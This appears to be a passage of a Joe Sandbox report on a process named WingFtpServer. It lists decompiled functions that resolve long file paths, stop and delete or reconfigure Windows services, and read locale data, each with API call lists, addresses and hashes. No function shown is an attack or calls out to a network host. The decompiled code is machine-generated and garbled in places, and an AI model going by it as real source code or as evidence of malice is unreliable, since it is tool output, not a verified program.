                                                                                                                                                                                                  • Instruction ID: 2bcb2df4dea57b2cdd4fe98185f34e2c58109deca2fddbf82c09e06edb366eed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 757090cb02351df411a46c82c8257f575b5a73ee85a62fbe5bd48a1d91c13753
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B21E774A54388BEEB31EBA5CD52FEEB7BCDB04708F0048B7F514AA282D6759644C624
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AACE68 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                                  			E03AACE68(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E03AACE44(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E03AACE44(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E03AAC88C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E03AACE44(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E03AAC88C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E03AAC88C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E03AAC88C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E03AAC88C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                                                                                                                                                  0x03aace74
                                                                                                                                                                                                  0x03aace77
                                                                                                                                                                                                  0x03aace7d
                                                                                                                                                                                                  0x03aace8a
                                                                                                                                                                                                  0x03aace8e
                                                                                                                                                                                                  0x03aacecd
                                                                                                                                                                                                  0x03aaced4
                                                                                                                                                                                                  0x03aacf14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aaced6
                                                                                                                                                                                                  0x03aacede
                                                                                                                                                                                                  0x03aaceef
                                                                                                                                                                                                  0x03aacef5
                                                                                                                                                                                                  0x03aacefb
                                                                                                                                                                                                  0x03aacf03
                                                                                                                                                                                                  0x03aacf09
                                                                                                                                                                                                  0x03aacf17
                                                                                                                                                                                                  0x03aacf19
                                                                                                                                                                                                  0x03aacf1c
                                                                                                                                                                                                  0x03aacf1e
                                                                                                                                                                                                  0x03aacf20
                                                                                                                                                                                                  0x03aacf20
                                                                                                                                                                                                  0x03aacf23
                                                                                                                                                                                                  0x03aacf2b
                                                                                                                                                                                                  0x03aacf3c
                                                                                                                                                                                                  0x03aad003
                                                                                                                                                                                                  0x03aacf4e
                                                                                                                                                                                                  0x03aacf52
                                                                                                                                                                                                  0x03aacf54
                                                                                                                                                                                                  0x03aacf56
                                                                                                                                                                                                  0x03aacf58
                                                                                                                                                                                                  0x03aacf58
                                                                                                                                                                                                  0x03aacf63
                                                                                                                                                                                                  0x03aacf73
                                                                                                                                                                                                  0x03aacf77
                                                                                                                                                                                                  0x03aacf79
                                                                                                                                                                                                  0x03aacf7b
                                                                                                                                                                                                  0x03aacf7d
                                                                                                                                                                                                  0x03aacf7d
                                                                                                                                                                                                  0x03aacf83
                                                                                                                                                                                                  0x03aacf9b
                                                                                                                                                                                                  0x03aacfa2
                                                                                                                                                                                                  0x03aacfa8
                                                                                                                                                                                                  0x03aacfc4
                                                                                                                                                                                                  0x03aacfc6
                                                                                                                                                                                                  0x03aacfed
                                                                                                                                                                                                  0x03aacfff
                                                                                                                                                                                                  0x03aad001
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad001
                                                                                                                                                                                                  0x03aacfc4
                                                                                                                                                                                                  0x03aacfa2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aacf63
                                                                                                                                                                                                  0x03aad019
                                                                                                                                                                                                  0x03aad019
                                                                                                                                                                                                  0x03aacf2b
                                                                                                                                                                                                  0x03aacf09
                                                                                                                                                                                                  0x03aacef5
                                                                                                                                                                                                  0x03aacede
                                                                                                                                                                                                  0x03aace90
                                                                                                                                                                                                  0x03aace9b
                                                                                                                                                                                                  0x03aace9f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aacea1
                                                                                                                                                                                                  0x03aacea1
                                                                                                                                                                                                  0x03aaceac
                                                                                                                                                                                                  0x03aaceb0
                                                                                                                                                                                                  0x03aaceb5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aaceb7
                                                                                                                                                                                                  0x03aacec3
                                                                                                                                                                                                  0x03aacec3
                                                                                                                                                                                                  0x03aaceb5
                                                                                                                                                                                                  0x03aace9f
                                                                                                                                                                                                  0x03aad01e
                                                                                                                                                                                                  0x03aad027

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,03ABAF9C,?,?), ref: 03AACE85
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 03AACE96
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,kernel32.dll,03ABAF9C,?,?), ref: 03AACF96
                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,kernel32.dll,03ABAF9C,?,?), ref: 03AACFA8
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,03ABAF9C,?,?), ref: 03AACFB4
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,03ABAF9C,?,?), ref: 03AACFF9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                  • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                                                                                                                  • API String ID: 1930782624-3908791685
                                                                                                                                                                                                  • Opcode ID: d0ae8f50ccc7a134aea39c9f1e648fa5d1f2994171fccc44699a38343b06d4da
                                                                                                                                                                                                  • Instruction ID: bf93384250442717c52c3bf0f2e0a8ca5744728895b2e370370de1b5068374d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ae8f50ccc7a134aea39c9f1e648fa5d1f2994171fccc44699a38343b06d4da
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441F537E00A089BDB20DB6CCD80ADDB3B5AF44320F1844AA9545EB344E7749F45DB84
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03BC4C7C Relevance: 9.1, APIs: 6, Instructions: 61serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                                  			E03BC4C7C(char _a4) {
				void* _v12;
				void* _v16;
				struct _SERVICE_STATUS _v44;
				intOrPtr _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xffffffd8;
				E03AA9D20( &_a4);
				_push(_t42);
				_push(0x3bc4d2c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v12 = OpenSCManagerW(0, 0, 0xf003f);
				if(_v12 == 0) {
					_pop(_t39);
					 *[fs:eax] = _t39;
					_push(E03BC4D33);
					return E03AA9C64( &_a4);
				} else {
					_push(_t42);
					_push(0x3bc4d0f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_v16 = OpenServiceW(_v12, E03AAA724(_a4), 0xf01ff);
					ControlService(_v16, 1,  &_v44);
					DeleteService(_v16);
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(E03BC4D16);
					CloseServiceHandle(_v16);
					return CloseServiceHandle(_v12);
				}
			}











                                                                                                                                                                                                  0x03bc4c7d
                                                                                                                                                                                                  0x03bc4c7f
                                                                                                                                                                                                  0x03bc4c85
                                                                                                                                                                                                  0x03bc4c8c
                                                                                                                                                                                                  0x03bc4c8d
                                                                                                                                                                                                  0x03bc4c92
                                                                                                                                                                                                  0x03bc4c95
                                                                                                                                                                                                  0x03bc4ca6
                                                                                                                                                                                                  0x03bc4cad
                                                                                                                                                                                                  0x03bc4d18
                                                                                                                                                                                                  0x03bc4d1b
                                                                                                                                                                                                  0x03bc4d1e
                                                                                                                                                                                                  0x03bc4d2b
                                                                                                                                                                                                  0x03bc4caf
                                                                                                                                                                                                  0x03bc4cb1
                                                                                                                                                                                                  0x03bc4cb2
                                                                                                                                                                                                  0x03bc4cb7
                                                                                                                                                                                                  0x03bc4cba
                                                                                                                                                                                                  0x03bc4cd4
                                                                                                                                                                                                  0x03bc4ce1
                                                                                                                                                                                                  0x03bc4cea
                                                                                                                                                                                                  0x03bc4cf1
                                                                                                                                                                                                  0x03bc4cf4
                                                                                                                                                                                                  0x03bc4cf7
                                                                                                                                                                                                  0x03bc4d00
                                                                                                                                                                                                  0x03bc4d0e
                                                                                                                                                                                                  0x03bc4d0e

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AA9D20: SysAllocStringLen.OLEAUT32(?,?), ref: 03AA9D2E
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4CA1
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF,00000000,03BC4D0F,?,00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4CCF
                                                                                                                                                                                                  • ControlService.ADVAPI32(?,00000001,?,00000000,00000000,000F01FF,00000000,03BC4D0F,?,00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4CE1
                                                                                                                                                                                                  • DeleteService.ADVAPI32(?,?,00000001,?,00000000,00000000,000F01FF,00000000,03BC4D0F,?,00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4CEA
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,03BC4D16,?,00000000,00000000,000F01FF,00000000,03BC4D0F,?,00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4D00
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,03BC4D16,?,00000000,00000000,000F01FF,00000000,03BC4D0F,?,00000000,00000000,000F003F,00000000,03BC4D2C), ref: 03BC4D09
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandleOpen$AllocControlDeleteManagerString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 619985493-0
                                                                                                                                                                                                  • Opcode ID: b5bc0ba38bf56bc8c132af71d04d82dfa7d3c84211739360b3b1497735a8dc86
                                                                                                                                                                                                  • Instruction ID: 770de463deaa5320330f37ad6a1b0cc761af6ec368082963b5075499f103a8ad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5bc0ba38bf56bc8c132af71d04d82dfa7d3c84211739360b3b1497735a8dc86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A411BF39A00748BFDB12EBA5CD61AAE7BBCEB09700F4148A6F514DB681D6749A00CA20
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03BC4B94 Relevance: 7.6, APIs: 5, Instructions: 74serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                                  			E03BC4B94(void* __edx, char _a4, char _a8) {
				void* _v12;
				void* _v16;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t46 = _t47;
				_t48 = _t47 + 0xfffffff4;
				E03AA9D20( &_a4);
				E03AA9D20( &_a8);
				_push(_t46);
				_push(0x3bc4c68);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48;
				_v12 = OpenSCManagerW(0, 0, 0xf003f);
				if(_v12 == 0) {
					L4:
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E03BC4C6F);
					return E03AA9CDC( &_a4, 2);
				} else {
					_push(_t46);
					_push(0x3bc4c46);
					_push( *[fs:eax]);
					 *[fs:eax] = _t48;
					_v16 = OpenServiceW(_v12, E03AAA724(_a4), 0xf01ff);
					if(ChangeServiceConfigW(_v16, 0xffffffff, 0xffffffff, 0xffffffff, E03AAA724(_a8), 0, 0, 0, 0, 0, 0) != 0) {
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(E03BC4C4D);
						CloseServiceHandle(_v16);
						return CloseServiceHandle(_v12);
					} else {
						E03AA938C();
						goto L4;
					}
				}
			}










                                                                                                                                                                                                  0x03bc4b95
                                                                                                                                                                                                  0x03bc4b97
                                                                                                                                                                                                  0x03bc4b9d
                                                                                                                                                                                                  0x03bc4ba5
                                                                                                                                                                                                  0x03bc4bac
                                                                                                                                                                                                  0x03bc4bad
                                                                                                                                                                                                  0x03bc4bb2
                                                                                                                                                                                                  0x03bc4bb5
                                                                                                                                                                                                  0x03bc4bc6
                                                                                                                                                                                                  0x03bc4bcd
                                                                                                                                                                                                  0x03bc4c4d
                                                                                                                                                                                                  0x03bc4c4f
                                                                                                                                                                                                  0x03bc4c52
                                                                                                                                                                                                  0x03bc4c55
                                                                                                                                                                                                  0x03bc4c67
                                                                                                                                                                                                  0x03bc4bcf
                                                                                                                                                                                                  0x03bc4bd1
                                                                                                                                                                                                  0x03bc4bd2
                                                                                                                                                                                                  0x03bc4bd7
                                                                                                                                                                                                  0x03bc4bda
                                                                                                                                                                                                  0x03bc4bf4
                                                                                                                                                                                                  0x03bc4c1d
                                                                                                                                                                                                  0x03bc4c28
                                                                                                                                                                                                  0x03bc4c2b
                                                                                                                                                                                                  0x03bc4c2e
                                                                                                                                                                                                  0x03bc4c37
                                                                                                                                                                                                  0x03bc4c45
                                                                                                                                                                                                  0x03bc4c1f
                                                                                                                                                                                                  0x03bc4c1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4c1f
                                                                                                                                                                                                  0x03bc4c1d

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AA9D20: SysAllocStringLen.OLEAUT32(?,?), ref: 03AA9D2E
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,03BC4C68), ref: 03BC4BC1
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF,00000000,03BC4C46,?,00000000,00000000,000F003F,00000000,03BC4C68), ref: 03BC4BEF
                                                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000F01FF,00000000,03BC4C46), ref: 03BC4C16
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,03BC4C4D,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000F01FF,00000000,03BC4C46), ref: 03BC4C37
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,03BC4C4D,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000F01FF,00000000,03BC4C46), ref: 03BC4C40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandleOpen$AllocChangeConfigManagerString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3308236590-0
                                                                                                                                                                                                  • Opcode ID: 2881042f985b202be607fd10c2582696e05ad586e33cb3bbc8cea00e1cee5bf0
                                                                                                                                                                                                  • Instruction ID: df82a6de24cdfcd6b8f87105de33962e73d614c0b4d2ba4856143958732c442d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2881042f985b202be607fd10c2582696e05ad586e33cb3bbc8cea00e1cee5bf0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3311F039604748BFDB21EB68CD51BAE77ACEB45720F508AB6B4248B6E0D7348A00C620
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AACA0C Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                                  			E03AACA0C(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x3aacb71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E03AA9C1C(_v8);
				_t85 = _t80 -  *0x3bcea00; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x3bcec00; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x3bcea00 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x3bcea00 + _t61 * 8));
									if(__eflags <= 0) {
										E03AAC92C( *((intOrPtr*)(0x3bcea04 + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E03AAA99C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x3aacb8c);
					E03AAA99C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E03AACB9C);
					E03AAA99C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E03AAABD4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E03AACB78);
				return E03AA9C7C( &_v364, 3);
			}

















                                                                                                                                                                                                  0x03aaca0c
                                                                                                                                                                                                  0x03aaca17
                                                                                                                                                                                                  0x03aaca1a
                                                                                                                                                                                                  0x03aaca20
                                                                                                                                                                                                  0x03aaca26
                                                                                                                                                                                                  0x03aaca2c
                                                                                                                                                                                                  0x03aaca2f
                                                                                                                                                                                                  0x03aaca33
                                                                                                                                                                                                  0x03aaca34
                                                                                                                                                                                                  0x03aaca39
                                                                                                                                                                                                  0x03aaca3c
                                                                                                                                                                                                  0x03aaca42
                                                                                                                                                                                                  0x03aaca47
                                                                                                                                                                                                  0x03aaca4e
                                                                                                                                                                                                  0x03aaca50
                                                                                                                                                                                                  0x03aaca57
                                                                                                                                                                                                  0x03aaca59
                                                                                                                                                                                                  0x03aaca60
                                                                                                                                                                                                  0x03aaca66
                                                                                                                                                                                                  0x03aaca68
                                                                                                                                                                                                  0x03aaca6d
                                                                                                                                                                                                  0x03aaca77
                                                                                                                                                                                                  0x03aaca7e
                                                                                                                                                                                                  0x03aaca86
                                                                                                                                                                                                  0x03aaca98
                                                                                                                                                                                                  0x03aaca88
                                                                                                                                                                                                  0x03aaca89
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aaca89
                                                                                                                                                                                                  0x03aaca79
                                                                                                                                                                                                  0x03aaca7b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aaca7b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aaca9f
                                                                                                                                                                                                  0x03aaca9f
                                                                                                                                                                                                  0x03aaca68
                                                                                                                                                                                                  0x03aaca66
                                                                                                                                                                                                  0x03aaca57
                                                                                                                                                                                                  0x03aacaa4
                                                                                                                                                                                                  0x03aacaaa
                                                                                                                                                                                                  0x03aacace
                                                                                                                                                                                                  0x03aacad2
                                                                                                                                                                                                  0x03aacae3
                                                                                                                                                                                                  0x03aacaf9
                                                                                                                                                                                                  0x03aacafe
                                                                                                                                                                                                  0x03aacb04
                                                                                                                                                                                                  0x03aacb1a
                                                                                                                                                                                                  0x03aacb1f
                                                                                                                                                                                                  0x03aacb25
                                                                                                                                                                                                  0x03aacb3b
                                                                                                                                                                                                  0x03aacb40
                                                                                                                                                                                                  0x03aacb4e
                                                                                                                                                                                                  0x03aacb4e
                                                                                                                                                                                                  0x03aacb55
                                                                                                                                                                                                  0x03aacb58
                                                                                                                                                                                                  0x03aacb5b
                                                                                                                                                                                                  0x03aacb70

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000002,00000000,03AACB71,?,03ABAF9C,?,00000000), ref: 03AACAB6
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,03AACB71,?,03ABAF9C,?,00000000), ref: 03AACAD2
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,03AACB71,?,03ABAF9C,?,00000000), ref: 03AACAE3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale$Info$Valid
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1826331170-0
                                                                                                                                                                                                  • Opcode ID: ce8d4eed4cb4b6681d14a9cbdded61462dbb9bebad735c9e59beabd6a3225f84
                                                                                                                                                                                                  • Instruction ID: 1a9782a63bf8c229f428990db55a228a068f8abf8f931a727b4781f229f45672
